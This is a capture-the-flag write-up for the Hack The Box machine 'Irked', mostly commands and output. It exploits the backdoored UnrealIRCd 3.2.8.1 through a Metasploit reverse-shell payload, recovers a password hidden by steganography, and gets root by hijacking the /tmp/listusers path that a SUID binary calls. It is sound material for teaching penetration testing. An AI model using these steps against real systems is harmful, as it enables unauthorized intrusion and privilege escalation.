HTB Irked

$ nmap -A -T4 -p- 10.10.10.117

Starting Nmap 7.91 ( https://nmap.org ) at 2020-10-15 22:50 CEST
Nmap scan report for 10.10.10.117
Host is up (0.043s latency).
Not shown: 65528 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey: 
|   1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
|   2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
|   256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
|_  256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Site doesn't have a title (text/html).
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          36864/udp6  status
|   100024  1          39620/udp   status
|   100024  1          44996/tcp6  status
|_  100024  1          59146/tcp   status
6697/tcp  open  irc     UnrealIRCd
8067/tcp  open  irc     UnrealIRCd
59146/tcp open  status  1 (RPC #100024)
65534/tcp open  irc     UnrealIRCd (Admin email djmardov@irked.htb)
Service Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 65.04 seconds

Access to http://10.10.10.117

According to Nmap's results, these open ports belong to UnrealIRCd:

  • 6697/tcp open irc UnrealIRCd
  • 8067/tcp open irc UnrealIRCd
  • 65534/tcp open irc UnrealIRCd (Admin email djmardov@irked.htb)

Since the box runs an IRC server, let's start by connecting to it.

$ sudo irssi 10.10.10.117 65534

Irssi v1.2.2-1+b1 - https://irssi.org             
17:18 -!- Irssi: Looking up 10.10.10.117
17:18 -!- Irssi: The following settings were initialized
17:18                        real_name root
17:18                        user_name root
17:18                             nick root
17:18 -!- Irssi: Connecting to 10.10.10.117 [10.10.10.117] port 65534
17:18 -!- Irssi: Connection to 10.10.10.117 established
17:18 !irked.htb *** Looking up your hostname...
17:18 !irked.htb *** Couldn't resolve your hostname; using your IP address instead
17:18 -!- You have not registered
17:18 -!- Welcome to the ROXnet IRC Network root!root@10.10.14.25
17:18 -!- Your host is irked.htb, running version Unreal3.2.8.1
17:18 -!- This server was created Mon May 14 2018 at 13:12:50 EDT
17:18 -!- irked.htb Unreal3.2.8.1 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGj
17:18 -!- UHNAMES NAMESX SAFELIST HCN MAXCHANNELS=10 CHANLIMIT=#:10 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 TOPICLEN=307 KICKLEN=307 AWAYLEN=307 
          MAXTARGETS=20 are supported by this server
17:18 -!- WALLCHOPS WATCH=128 WATCHOPTS=A SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=beI,kfL,lj,psmntirRcOAQKVCuzNSMTG NETWORK=ROXnet 
          CASEMAPPING=ascii EXTBAN=~,cqnr ELIST=MNUCT STATUSMSG=~&@%+ are supported by this server
17:18 -!- EXCEPTS INVEX CMDS=KNOCK,MAP,DCCALLOW,USERIP are supported by this server
17:18 -!- There are 1 users and 0 invisible on 1 servers
17:18 -!- I have 1 clients and 0 servers
17:18 -!- Current Local Users: 1  Max: 2
17:18 -!- Current Global Users: 1  Max: 2
17:18 -!- MOTD File is missing
17:18 -!- Mode change [+iwx] for user root

According to this banner, the server is running UnrealIRCd version 3.2.8.1.

$ searchsploit unrealirc

------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                |  Path
------------------------------------------------------------------------------ ---------------------------------
UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit)                  | linux/remote/16922.rb
UnrealIRCd 3.2.8.1 - Local Configuration Stack Overflow                       | windows/dos/18011.txt
UnrealIRCd 3.2.8.1 - Remote Downloader/Execute                                | linux/remote/13853.pl
UnrealIRCd 3.x - Remote Denial of Service                                     | windows/dos/27407.pl
------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

Exploiting UnrealIRCd

According to https://www.exploit-db.com/exploits/16922

UnrealIRCd 3.2.8.1, as distributed on certain mirror sites from November 2009 through June 2010, contains an externally introduced modification (Trojan Horse) in the DEBUG3_DOLOG_SYSTEM macro, which allows remote attackers to execute arbitrary commands.

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2075

We can use a Metasploit module directly.

msf5 > search unrealirc

Matching Modules
================

   #  Name                                        Disclosure Date  Rank       Check  Description
   -  ----                                        ---------------  ----       -----  -----------
   0  exploit/unix/irc/unreal_ircd_3281_backdoor  2010-06-12       excellent  No     UnrealIRCD 3.2.8.1 Backdoor Command Execution

msf5 > use 0
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > options

Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   6667             yes       The target port (TCP)

Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set rhost 10.10.10.117
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set rport 65534
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > show payloads

Compatible Payloads
===================

   #   Name                                Disclosure Date  Rank    Check  Description
   -   ----                                ---------------  ----    -----  -----------
   0   cmd/unix/bind_perl                                   manual  No     Unix Command Shell, Bind TCP (via Perl)
   1   cmd/unix/bind_perl_ipv6                              manual  No     Unix Command Shell, Bind TCP (via perl) IPv6
   2   cmd/unix/bind_ruby                                   manual  No     Unix Command Shell, Bind TCP (via Ruby)
   3   cmd/unix/bind_ruby_ipv6                              manual  No     Unix Command Shell, Bind TCP (via Ruby) IPv6
   4   cmd/unix/generic                                     manual  No     Unix Command, Generic Command Execution
   5   cmd/unix/reverse                                     manual  No     Unix Command Shell, Double Reverse TCP (telnet)
   6   cmd/unix/reverse_bash_telnet_ssl                     manual  No     Unix Command Shell, Reverse TCP SSL (telnet)
   7   cmd/unix/reverse_perl                                manual  No     Unix Command Shell, Reverse TCP (via Perl)
   8   cmd/unix/reverse_perl_ssl                            manual  No     Unix Command Shell, Reverse TCP SSL (via perl)
   9   cmd/unix/reverse_ruby                                manual  No     Unix Command Shell, Reverse TCP (via Ruby)
   10  cmd/unix/reverse_ruby_ssl                            manual  No     Unix Command Shell, Reverse TCP SSL (via Ruby)
   11  cmd/unix/reverse_ssl_double_telnet                   manual  No     Unix Command Shell, Double Reverse TCP SSL (telnet)

msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > use 5
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options

Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  10.10.10.117     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   65534            yes       The target port (TCP)

Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > run

[-] 10.10.10.117:65534 - Exploit failed: An exploitation error occurred.
[*] Exploit completed, but no session was created.
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set payload cmd/unix/reverse 
payload => cmd/unix/reverse

msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options

Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  10.10.10.117     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   65534            yes       The target port (TCP)

Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set lhost 10.10.14.25
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options

Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  10.10.10.117     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   65534            yes       The target port (TCP)

Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.14.25      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > run

[*] Started reverse TCP double handler on 10.10.14.25:4444 
[*] 10.10.10.117:65534 - Connected to 10.10.10.117:65534...
    :irked.htb NOTICE AUTH :*** Looking up your hostname...
[*] 10.10.10.117:65534 - Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo nRUzxoihQNyXr1sC;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "nRUzxoihQNyXr1sC\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.14.25:4444 -> 10.10.10.117:52954) at

whoami

ircd

python3 -c "import pty;pty.spawn('/bin/bash')"

ircd@irked:~$

ircd@irked:/home/djmardov/Documents$ ls -la

total 16
drwxr-xr-x  2 djmardov djmardov 4096 May 15  2018 .
drwxr-xr-x 18 djmardov djmardov 4096 Nov  3  2018 ..
-rw-r--r--  1 djmardov djmardov   52 May 16  2018 .backup
-rw-------  1 djmardov djmardov   33 May 15  2018 user.txt

ircd@irked:/home/djmardov/Documents$ cat .backup

Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss

This comment points to steganography, where messages are usually hidden inside images.

So far we have seen only one image, on http://10.10.10.117.

Download this image to our local machine.

$ ls 

irked.jpg linpeas.sh results

$ steghide extract -sf irked.jpg

Anotar salvoconducto: 
anoté los datos extraídos e/"pass.txt".

Use the password found in the .backup file.

$ cat pass.txt

Kab6h+m+bbp2J:HG

ircd@irked:/home$ su djmardov

Password: Kab6h+m+bbp2J:HG

djmardov@irked:/home$ ls

djmardov  ircd

djmardov@irked:/home$ cd djmardov
djmardov@irked:~$ cd Documents
djmardov@irked:~/Documents$ cat user.txt

4a66XXXXXXXXXXXXXXXXXXXXXXXXXXXX

From the LinPEAS results, this is the list of SUID files.

====================================( Interesting Files )=====================================                                                                                
[+] SUID - Check easy privesc, exploits and write perms                                
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid          
-rwsr-sr-x 1 root   root       9.3K Apr  1  2014 /usr/bin/X                            
-rwsr-xr-x 1 root   root        95K Aug 13  2014 /sbin/mount.nfs
-rwsr-sr-x 1 daemon daemon      50K Sep 30  2014 /usr/bin/at  --->  RTru64_UNIX_4.0g(CVE-2002-1614)                                                                           
-rwsr-xr-x 1 root   root        14K Oct 14  2014 /usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
-rwsr-xr-x 1 root   root        26K Mar 29  2015 /bin/umount  --->  BSD/Linux(08-1996)
-rwsr-xr-x 1 root   root        34K Mar 29  2015 /bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8                                              
-rwsr-xr-- 1 root   dip        332K Apr 14  2015 /usr/sbin/pppd  --->  Apple_Mac_OSX_10.4.8(05-2007)                                                                          
-rwsr-xr-x 1 root   root        34K Jan 21  2016 /bin/fusermount
-rwsr-xr-x 1 root   root        14K Sep  8  2016 /usr/lib/policykit-1/polkit-agent-helper-1                                                                                   
-rwsr-xr-x 1 root   root        18K Sep  8  2016 /usr/bin/pkexec  --->  Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)                                             
-rwsr-xr-- 1 root   messagebus 355K Nov 21  2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper                                                                                  
-rwsr-xr-x 1 root   root       158K Jan 28  2017 /bin/ntfs-3g  --->  Debian9/8/7/Ubuntu/Gentoo/others/Ubuntu_Server_16.10_and_others(02-2017)                                 
-rwsr-xr-x 1 root   root       9.3K Mar 28  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root   root        52K May 17  2017 /usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)               
-rwsr-xr-x 1 root   root        77K May 17  2017 /usr/bin/gpasswd
-rwsr-xr-x 1 root   root        43K May 17  2017 /usr/bin/chsh
-rwsr-xr-x 1 root   root        52K May 17  2017 /usr/bin/chfn  --->  SuSE_9.3/10
-rwsr-xr-x 1 root   root        38K May 17  2017 /usr/bin/newgrp  --->  HP-UX_10.20
-rwsr-xr-x 1 root   root        38K May 17  2017 /bin/su
-rwsr-sr-x 1 root   mail        94K Nov 18  2017 /usr/bin/procmail
-rwsr-xr-x 1 root   root       550K Nov 19  2017 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root   root       1.1M Feb 10  2018 /usr/sbin/exim4
-rwsr-xr-x 1 root   root       7.2K May 16  2018 /usr/bin/viewuser

/usr/bin/viewuser is not part of a default Linux installation, so it is our first candidate to analyze.

djmardov@irked:/usr/bin$ ls -la viewuser

-rwsr-xr-x 1 root root 7328 May 16  2018 viewuser

djmardov@irked:/usr/bin$ file viewuser

viewuser: setuid ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=69ba4bc75bf72037f1ec492bc4cde2550eeac4bb, not stripped

djmardov@irked:/usr/bin$ ./viewuser

This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2020-10-15 16:45 (:0)
sh: 1: /tmp/listusers: not found

$ scp djmardov@10.10.10.117:/usr/bin/viewuser viewuser

The authenticity of host '10.10.10.117 (10.10.10.117)' can't be established.
ECDSA key fingerprint is SHA256:kunqU6QEf9TV3pbsZKznVcntLklRwiVobFZiJguYs4g.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.117' (ECDSA) to the list of known hosts.
djmardov@10.10.10.117's password: 
viewuser

$ r2 viewuser

[0x00000440]> aaaa
[x] Analyze all flags starting with sym. and entry0 (aa)
[x] Analyze function calls (aac)
[x] Analyze len bytes of instructions for references (aar)
[x] Check for objc references
[x] Check for vtables
[x] Type matching analysis for all functions (aaft)
[x] Propagate noreturn information
[x] Use -AA or aaaa to perform additional experimental analysis.
[x] Finding function preludes
[x] Enable constraint types analysis for variables

[0x00000440]> afl

0x00000440    1 49           entry0
0x00000472    1 4            fcn.00000472
0x00000410    1 6            sym.imp.__libc_start_main
0x00000490    4 58   -> 53   sym.deregister_tm_clones
0x00000579    1 4            sym.__x86.get_pc_thunk.dx
0x000004d0    4 71           sym.register_tm_clones
0x00000520    5 71           entry.fini0
0x00000480    1 4            sym.__x86.get_pc_thunk.bx
0x00000570    1 9            entry.init0
0x00000660    1 2            sym.__libc_csu_fini
0x00000664    1 20           sym._fini
0x00000600    4 93           sym.__libc_csu_init
0x0000057d    1 126          main
0x000003f0    1 6            sym.imp.puts
0x00000400    1 6            sym.imp.system
0x00000420    1 6            sym.imp.setuid
0x000003bc    3 35           sym._init
0x00000000    2 32           loc.imp._ITM_deregisterTMCloneTable

[0x00000440]> pdf @main

┌ 126: int main (int32_t arg_4h);
│           ; var int32_t var_8h @ ebp-0x8
│           ; arg int32_t arg_4h @ esp+0x24
│           0x0000057d      8d4c2404       lea ecx, dword [arg_4h]
│           0x00000581      83e4f0         and esp, 0xfffffff0
│           0x00000584      ff71fc         push dword [ecx - 4]
│           0x00000587      55             push ebp
│           0x00000588      89e5           mov ebp, esp
│           0x0000058a      53             push ebx
│           0x0000058b      51             push ecx
│           0x0000058c      e8effeffff     call sym.__x86.get_pc_thunk.bx
│           0x00000591      81c36f1a0000   add ebx, 0x1a6f
│           0x00000597      83ec0c         sub esp, 0xc
│           0x0000059a      8d8380e6ffff   lea eax, dword [ebx - 0x1980]
│           0x000005a0      50             push eax                    ; const char *s
│           0x000005a1      e84afeffff     call sym.imp.puts           ; int puts(const char *s)
│           0x000005a6      83c410         add esp, 0x10
│           0x000005a9      83ec0c         sub esp, 0xc
│           0x000005ac      8d83c8e6ffff   lea eax, dword [ebx - 0x1938]
│           0x000005b2      50             push eax                    ; const char *s
│           0x000005b3      e838feffff     call sym.imp.puts           ; int puts(const char *s)
│           0x000005b8      83c410         add esp, 0x10
│           0x000005bb      83ec0c         sub esp, 0xc
│           0x000005be      8d83ede6ffff   lea eax, dword [ebx - 0x1913]
│           0x000005c4      50             push eax                    ; const char *string
│           0x000005c5      e836feffff     call sym.imp.system         ; int system(const char *string)
│           0x000005ca      83c410         add esp, 0x10
│           0x000005cd      83ec0c         sub esp, 0xc
│           0x000005d0      6a00           push 0
│           0x000005d2      e849feffff     call sym.imp.setuid
│           0x000005d7      83c410         add esp, 0x10
│           0x000005da      83ec0c         sub esp, 0xc
│           0x000005dd      8d83f1e6ffff   lea eax, dword [ebx - 0x190f]
│           0x000005e3      50             push eax                    ; const char *string
│           0x000005e4      e817feffff     call sym.imp.system         ; int system(const char *string)
│           0x000005e9      83c410         add esp, 0x10
│           0x000005ec      b800000000     mov eax, 0
│           0x000005f1      8d65f8         lea esp, dword [var_8h]
│           0x000005f4      59             pop ecx
│           0x000005f5      5b             pop ebx
│           0x000005f6      5d             pop ebp
│           0x000005f7      8d61fc         lea esp, dword [ecx - 4]
└           0x000005fa      c3             ret

According to this disassembly, the application calls setuid(0) and then calls system() with the string /tmp/listusers as its argument, which is why the earlier run printed "sh: 1: /tmp/listusers: not found".

This can be exploited by creating a file /tmp/listusers containing malicious code, which will be executed as root when the viewuser binary calls it.

djmardov@irked:/tmp$ echo "/bin/sh" > listusers

djmardov@irked:/tmp$ cd /usr/bin
djmardov@irked:/usr/bin$ ./viewuser

This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2020-10-15 16:45 (:0)
sh: 1: /tmp/listusers: Permission denied

djmardov@irked:/usr/bin$ cd /tmp
djmardov@irked:/tmp$ chmod 777 listusers
djmardov@irked:/tmp$ cd /usr/bin
djmardov@irked:/usr/bin$ ./viewuser

This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2020-10-15 16:45 (:0)
#

#whoami

root

#cd /root
#ls

pass.txt root.txt

#cat pass.txt

Kab6h+m+bbp2J:HG

#cat root.txt

8d8eXXXXXXXXXXXXXXXXXXXXXXXXXXXX
